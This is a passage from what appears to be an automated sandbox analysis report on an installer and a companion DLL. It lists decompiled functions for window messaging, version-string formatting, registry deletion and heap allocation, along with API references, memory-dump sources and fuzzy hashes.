                                                                                                                                                    • Instruction Fuzzy Hash: A4317CB1940206EFDB84EFE5D904BAA37B9BB46318F30962AF805563C0DB745544CFA6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E625440, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Base::Concurrency::details::ContextIdentityQueueWork
                                                                                                                                                    • String ID: '$msiexec
                                                                                                                                                    • API String ID: 2086788075-343622087
                                                                                                                                                    • Opcode ID: 4afdbf9cbe8fe4074fb9f7c3bda2e51b84072177e5ce63cb5fcb07c0818bd28e
                                                                                                                                                    • Instruction ID: 6495e29c2e7f98ecc16ba8964abfe1c4d70aa071d12416f3e57c44743869422c
                                                                                                                                                    • Opcode Fuzzy Hash: 4afdbf9cbe8fe4074fb9f7c3bda2e51b84072177e5ce63cb5fcb07c0818bd28e
                                                                                                                                                    • Instruction Fuzzy Hash: 87412C70900109EFCB14DFE4D994BEEBBB8BF04364F108629E8256B2D0DB746A45CF95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E652D44, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6E652D4B
                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6E652D8D
                                                                                                                                                      • Part of subcall function 6E652CAD: __EH_prolog3.LIBCMT ref: 6E652CB4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog3$H_prolog3_catch
                                                                                                                                                    • String ID: `$en$`$en
                                                                                                                                                    • API String ID: 1670334802-2927998856
                                                                                                                                                    • Opcode ID: ce4f07ad6e0ae21efbd4c24ee86280045a6ba238b4f813f1fe137c80f237646d
                                                                                                                                                    • Instruction ID: 3a3cc3d6e1b96803c0c2baf5a6239cdf542adb03d5363f7e97425356e5d71ed1
                                                                                                                                                    • Opcode Fuzzy Hash: ce4f07ad6e0ae21efbd4c24ee86280045a6ba238b4f813f1fe137c80f237646d
                                                                                                                                                    • Instruction Fuzzy Hash: 3F314171A1010AAFDB00DFE4CC14BEFB7B9AF05318F208A25E565AB290DB349A50DB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00401F80, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                    			E00401F80(int __ebx) {
				int _t25;
				signed int _t27;
				signed int _t28;
				long _t32;
				struct HWND__* _t36;
				int _t37;
				signed int _t38;
				int _t43;
				void* _t45;
				void* _t46;
				void* _t52;
				int _t54;
				void* _t55;
				struct HWND__* _t59;
				void* _t62;

				_t43 = __ebx;
				_t45 = 3;
				_t25 = E00401446(_t45);
				_t46 = 4;
				 *(_t62 - 0x34) = _t25;
				 *(_t62 + 8) = E00401446(_t46);
				if(( *(_t62 - 0x18) & 0x00000001) != 0) {
					 *(_t62 - 0x34) = E0040145C(_t55, 0x33);
				}
				if(( *(_t62 - 0x18) & 0x00000002) != 0) {
					 *(_t62 + 8) = E0040145C(_t55, 0x44);
				}
				if( *((intOrPtr*)(_t62 - 0x30)) != 0x21) {
					_t27 = E0040145C(_t55, 1);
					_t28 = E0040145C(_t55, 0x12);
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t32 = FindWindowExW( *(_t62 - 0x34),  *(_t62 + 8),  ~( *_t27 & 0x0000ffff) & _t27,  ~( *_t28 & 0x0000ffff) & _t28);
					goto L9;
				} else {
					_t36 = E00401446(1);
					_t52 = 2;
					_t59 = _t36;
					_t37 = E00401446(_t52);
					_t54 =  *(_t62 - 0x18) >> 2;
					if(_t54 == _t43) {
						_t32 = SendMessageW(_t59, _t37,  *(_t62 - 0x34),  *(_t62 + 8));
						L9:
						 *(_t62 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutW(_t59, _t37,  *(_t62 - 0x34),  *(_t62 + 8), _t43, _t54, _t62 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t62 - 4)) =  ~_t38 + 1;
					}
				}
				if( *((intOrPtr*)(_t62 - 0x2c)) >= _t43) {
					_push( *(_t62 - 8));
					E00405F7D();
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t62 - 4));
				return 0;
			}


















                                                                                                                                                    0x00401f80
                                                                                                                                                    0x00401f82
                                                                                                                                                    0x00401f83
                                                                                                                                                    0x00401f8a
                                                                                                                                                    0x00401f8b
                                                                                                                                                    0x00401f97
                                                                                                                                                    0x00401f9a
                                                                                                                                                    0x00401fa3
                                                                                                                                                    0x00401fa3
                                                                                                                                                    0x00401faa
                                                                                                                                                    0x00401fb3
                                                                                                                                                    0x00401fb3
                                                                                                                                                    0x00401fba
                                                                                                                                                    0x00402008
                                                                                                                                                    0x00402011
                                                                                                                                                    0x0040201b
                                                                                                                                                    0x00402025
                                                                                                                                                    0x00402030
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401fbc
                                                                                                                                                    0x00401fbf
                                                                                                                                                    0x00401fc6
                                                                                                                                                    0x00401fc7
                                                                                                                                                    0x00401fc9
                                                                                                                                                    0x00401fd1
                                                                                                                                                    0x00401fd6
                                                                                                                                                    0x00401ffe
                                                                                                                                                    0x00402036
                                                                                                                                                    0x00402036
                                                                                                                                                    0x00401fd8
                                                                                                                                                    0x00401fe6
                                                                                                                                                    0x00401fee
                                                                                                                                                    0x00401ff1
                                                                                                                                                    0x00401ff1
                                                                                                                                                    0x00401fd6
                                                                                                                                                    0x0040203c
                                                                                                                                                    0x00402042
                                                                                                                                                    0x004030de
                                                                                                                                                    0x004030de
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030f2

                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageTimeoutW.USER32 ref: 00401FE6
                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                    • String ID: !
                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                    • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                    • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                    • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                    • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E635930, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6359E1
                                                                                                                                                      • Part of subcall function 6E62C8C0: _DebugHeapAllocator.LIBCPMTD ref: 6E62C8F8
                                                                                                                                                      • Part of subcall function 6E62C8C0: _DebugHeapAllocator.LIBCPMTD ref: 6E62C93A
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6359C6
                                                                                                                                                      • Part of subcall function 6E62C990: _DebugHeapAllocator.LIBCPMTD ref: 6E62C99E
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWork
                                                                                                                                                    • String ID: &el=$&t=event&ec=%s&ea=%s
                                                                                                                                                    • API String ID: 1698587239-3400884953
                                                                                                                                                    • Opcode ID: a5b8de6c99c8ecfbf8a2058998d3bcb6b90155625904c252c3f12acc9b2f2e79
                                                                                                                                                    • Instruction ID: 5d111330ac46b4fc0e10d1eee66ff639464e0325261310fbfaf15cacdbe9a9a5
                                                                                                                                                    • Opcode Fuzzy Hash: a5b8de6c99c8ecfbf8a2058998d3bcb6b90155625904c252c3f12acc9b2f2e79
                                                                                                                                                    • Instruction Fuzzy Hash: 4E3171B1C00259EFCB04CFD4DC40AEFBBBCAB54314F548969E9156B281EB349704CBA6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E660678, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,?,6E6608BD,?,?,00000000,?,6E6610B2,?,?,6E660959), ref: 6E660696
                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,6E6608BD,?,?,00000000,?,6E6610B2,?,?,6E660959,?,?,?,6E6610B2,00000001), ref: 6E66069D
                                                                                                                                                      • Part of subcall function 6E6605FA: GetProcessHeap.KERNEL32(?,?,?,6E6608DB,?,00000001,6E6610B2,?,?,6E660959,?,?,?,6E6610B2,00000001,?), ref: 6E66060B
                                                                                                                                                      • Part of subcall function 6E6605FA: HeapAlloc.KERNEL32(00000000,?,6E6608DB,?,00000001,6E6610B2,?,?,6E660959,?,?,?,6E6610B2,00000001,?,74B04D40), ref: 6E660612
                                                                                                                                                      • Part of subcall function 6E660736: GetProcessHeap.KERNEL32(00000000,?,?,6E6606C2,?,?,6E6610B2,?,6E6608BD,?,?,00000000,?,6E6610B2,?), ref: 6E66073E
                                                                                                                                                      • Part of subcall function 6E660736: HeapSize.KERNEL32(00000000,?,6E6606C2,?,?,6E6610B2,?,6E6608BD,?,?,00000000,?,6E6610B2,?,?,6E660959), ref: 6E660745
                                                                                                                                                    • _memcpy_s.LIBCMT ref: 6E6606E9
                                                                                                                                                    Strings
                                                                                                                                                    • c:\agent\_work\66\s\src\libs\dutil\memutil.cpp, xrefs: 6E66072A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$Process$Alloc$Size_memcpy_s
                                                                                                                                                    • String ID: c:\agent\_work\66\s\src\libs\dutil\memutil.cpp
                                                                                                                                                    • API String ID: 1169258713-1758765531
                                                                                                                                                    • Opcode ID: 58ccd149c231d0262e196282b02d102048da9ddcd77f64852aae5fe128e59a15
                                                                                                                                                    • Instruction ID: a36e9a0051a0104870144b91d85a7266debf36f702d005ebcb739823506d9791
                                                                                                                                                    • Opcode Fuzzy Hash: 58ccd149c231d0262e196282b02d102048da9ddcd77f64852aae5fe128e59a15
                                                                                                                                                    • Instruction Fuzzy Hash: CD112431561519BFCBB14EE88C5499F3F5EEB82328B004A30F8158F260F732CD119AE6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004043D9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                                    			E004043D9(unsigned int __eax, int _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v72;
				char _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				signed int _t43;
				unsigned int _t47;

				_t47 = __eax;
				_push(0x14);
				_pop(0);
				_v8 = 0xffffffdc;
				if(__eax < 0x100000) {
					_push(0xa);
					_pop(0);
					_v8 = 0xffffffdd;
				}
				if(_t47 < 0x400) {
					_v8 = 0xffffffde;
				}
				if(_t47 < 0xffff3333) {
					_t43 = 0x14;
					asm("cdq");
					_t47 = _t47 + 1 / _t43;
				}
				E00406831(0, _t47, 0x451d98, 0x451d98, _a8);
				_push(E00406831(0, _t47, 0x451d98,  &_v72, 0xffffffdf));
				_push(E00406831(0, _t47, 0x451d98,  &_v136, _v8));
				_t40 = 0xa;
				_push(((_t47 & 0x00ffffff) * 0xa >> 0) % _t40);
				_push(_t47 >> 0);
				wsprintfW( &(0x451d98[lstrlenW(0x451d98)]), L"%u.%u%s%s");
				return SetDlgItemTextW( *0x476a68, _a4, 0x451d98);
			}












                                                                                                                                                    0x004043e5
                                                                                                                                                    0x004043e7
                                                                                                                                                    0x004043e9
                                                                                                                                                    0x004043ea
                                                                                                                                                    0x004043f7
                                                                                                                                                    0x004043f9
                                                                                                                                                    0x004043fb
                                                                                                                                                    0x004043fc
                                                                                                                                                    0x004043fc
                                                                                                                                                    0x00404409
                                                                                                                                                    0x0040440d
                                                                                                                                                    0x0040440d
                                                                                                                                                    0x0040441a
                                                                                                                                                    0x00404425
                                                                                                                                                    0x00404426
                                                                                                                                                    0x00404429
                                                                                                                                                    0x00404429
                                                                                                                                                    0x00404434
                                                                                                                                                    0x00404444
                                                                                                                                                    0x00404454
                                                                                                                                                    0x00404465
                                                                                                                                                    0x0040446e
                                                                                                                                                    0x0040446f
                                                                                                                                                    0x00404483
                                                                                                                                                    0x0040449f

                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                    • wsprintfW.USER32 ref: 00404483
                                                                                                                                                    • SetDlgItemTextW.USER32 ref: 00404496
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                                    • Opcode ID: dfea5b50e45ff8be8bfc9556fdf0d102cde058af48904552fdcaee68f5e7691e
                                                                                                                                                    • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                    • Opcode Fuzzy Hash: dfea5b50e45ff8be8bfc9556fdf0d102cde058af48904552fdcaee68f5e7691e
                                                                                                                                                    • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E648E10, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E6370F0: task.LIBCPMTD ref: 6E63716F
                                                                                                                                                      • Part of subcall function 6E6370F0: task.LIBCPMTD ref: 6E63717B
                                                                                                                                                      • Part of subcall function 6E6370F0: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E637190
                                                                                                                                                      • Part of subcall function 6E6370F0: task.LIBCPMTD ref: 6E6371A8
                                                                                                                                                      • Part of subcall function 6E662DFE: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,?,?,?,8007000E), ref: 6E662E5E
                                                                                                                                                    • task.LIBCPMTD ref: 6E648EB8
                                                                                                                                                    • task.LIBCPMTD ref: 6E648EC7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorDispatcherExceptionUser
                                                                                                                                                    • String ID: H'in$type must be boolean, but is
                                                                                                                                                    • API String ID: 865528258-645554703
                                                                                                                                                    • Opcode ID: 50d494af23d587d20e85a0aa7bd92e57baa47a8cd6fc50de1217fe2034699ddb
                                                                                                                                                    • Instruction ID: 40aeec1495781af3d9d75c9f769e9be6c38bde3b1affdd39b42822faac43f154
                                                                                                                                                    • Opcode Fuzzy Hash: 50d494af23d587d20e85a0aa7bd92e57baa47a8cd6fc50de1217fe2034699ddb
                                                                                                                                                    • Instruction Fuzzy Hash: BB213C71D0425CEFCB04CFE4D850AEEBBB8EF58714F108569E815AB391EB34AA05CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E648D20, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E6370F0: task.LIBCPMTD ref: 6E63716F
                                                                                                                                                      • Part of subcall function 6E6370F0: task.LIBCPMTD ref: 6E63717B
                                                                                                                                                      • Part of subcall function 6E6370F0: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E637190
                                                                                                                                                      • Part of subcall function 6E6370F0: task.LIBCPMTD ref: 6E6371A8
                                                                                                                                                      • Part of subcall function 6E662DFE: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,?,?,?,8007000E), ref: 6E662E5E
                                                                                                                                                    • task.LIBCPMTD ref: 6E648DC8
                                                                                                                                                    • task.LIBCPMTD ref: 6E648DD7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorDispatcherExceptionUser
                                                                                                                                                    • String ID: H'in$type must be string, but is
                                                                                                                                                    • API String ID: 865528258-320553861
                                                                                                                                                    • Opcode ID: 01d964cbb56abca1de66cb3f558a810ef66e3b0d84cda6303c9718a135b89ed7
                                                                                                                                                    • Instruction ID: 18297ac511f11d37f84bfd576b251ee4b3923dda578784f7c4087f0952599cfb
                                                                                                                                                    • Opcode Fuzzy Hash: 01d964cbb56abca1de66cb3f558a810ef66e3b0d84cda6303c9718a135b89ed7
                                                                                                                                                    • Instruction Fuzzy Hash: 1421FA71D0021CEFDB14DFE4D950AEEBBB8EF54718F108529E415AB380EB346A05CB98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6412A0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ListMutex_baseMutex_base::~_std::_task
                                                                                                                                                    • String ID: cannot get value
                                                                                                                                                    • API String ID: 3357306528-2333289761
                                                                                                                                                    • Opcode ID: d8dcdd135b25d5750885bd7d17d34a4f7b7a777cf4de4d69b07a1cf28ec98546
                                                                                                                                                    • Instruction ID: a593e9fd19499d24c86e154c568df09a10b902856af3338a658bbfb4d053978f
                                                                                                                                                    • Opcode Fuzzy Hash: d8dcdd135b25d5750885bd7d17d34a4f7b7a777cf4de4d69b07a1cf28ec98546
                                                                                                                                                    • Instruction Fuzzy Hash: 4621AC71D04248EFCB05CBE8D850BEEBBB9EF49308F00861AE422A7391DB346418CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004027E3, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                    			E004027E3(void* __ebx, intOrPtr __ecx) {
				short* _t13;
				void* _t20;
				void* _t26;
				void* _t30;

				_t20 = __ebx;
				 *((intOrPtr*)(_t30 + 8)) = E004061EC(__ecx);
				if( *(_t30 - 0x1c) != __ebx) {
					_t13 = E0040145C(_t26, 0x22);
					_t28 = _t13;
					_push(_t13);
					E004062CF(L"DeleteRegKey: \"%s\\%s\"",  *((intOrPtr*)(_t30 + 8)));
					_t15 =  *((intOrPtr*)(_t30 - 0x28));
					if( *((intOrPtr*)(_t30 - 0x28)) == __ebx) {
						_t15 =  *0x47eb64 + 0x80000001;
					}
					 *((intOrPtr*)(_t30 - 0x14)) = E0040149D(_t15, _t28,  *(_t30 - 0x1c) & 0x00000002);
					goto L7;
				} else {
					__edi = E00401553(2);
					if(__edi == __ebx) {
						L1:
						 *((intOrPtr*)(_t30 - 4)) = 1;
					} else {
						__esi = E0040145C(__edx, 0x33);
						__eax = RegDeleteValueW(__edi, __esi);
						_push(__esi);
						_push(0x4140f8);
						 *(__ebp - 0x14) = __eax;
						E004062CF(L"DeleteRegValue: \"%s\\%s\" \"%s\"",  *((intOrPtr*)(__ebp + 8))) = RegCloseKey(__edi);
						L7:
						if( *((intOrPtr*)(_t30 - 0x14)) != _t20) {
							goto L1;
						}
					}
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}







                                                                                                                                                    0x004027e3
                                                                                                                                                    0x004027ea
                                                                                                                                                    0x004027f0
                                                                                                                                                    0x00402838
                                                                                                                                                    0x0040283d
                                                                                                                                                    0x0040283f
                                                                                                                                                    0x00402848
                                                                                                                                                    0x0040284d
                                                                                                                                                    0x00402855
                                                                                                                                                    0x0040285c
                                                                                                                                                    0x0040285c
                                                                                                                                                    0x0040286f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004027f2
                                                                                                                                                    0x004027f9
                                                                                                                                                    0x004027fd
                                                                                                                                                    0x00401a13
                                                                                                                                                    0x00401a13
                                                                                                                                                    0x00402803
                                                                                                                                                    0x0040280a
                                                                                                                                                    0x0040280e
                                                                                                                                                    0x00402814
                                                                                                                                                    0x00402815
                                                                                                                                                    0x0040281d
                                                                                                                                                    0x0040282e
                                                                                                                                                    0x00402872
                                                                                                                                                    0x00402875
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040287b
                                                                                                                                                    0x00402875
                                                                                                                                                    0x004027fd
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030f2

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    Strings
                                                                                                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
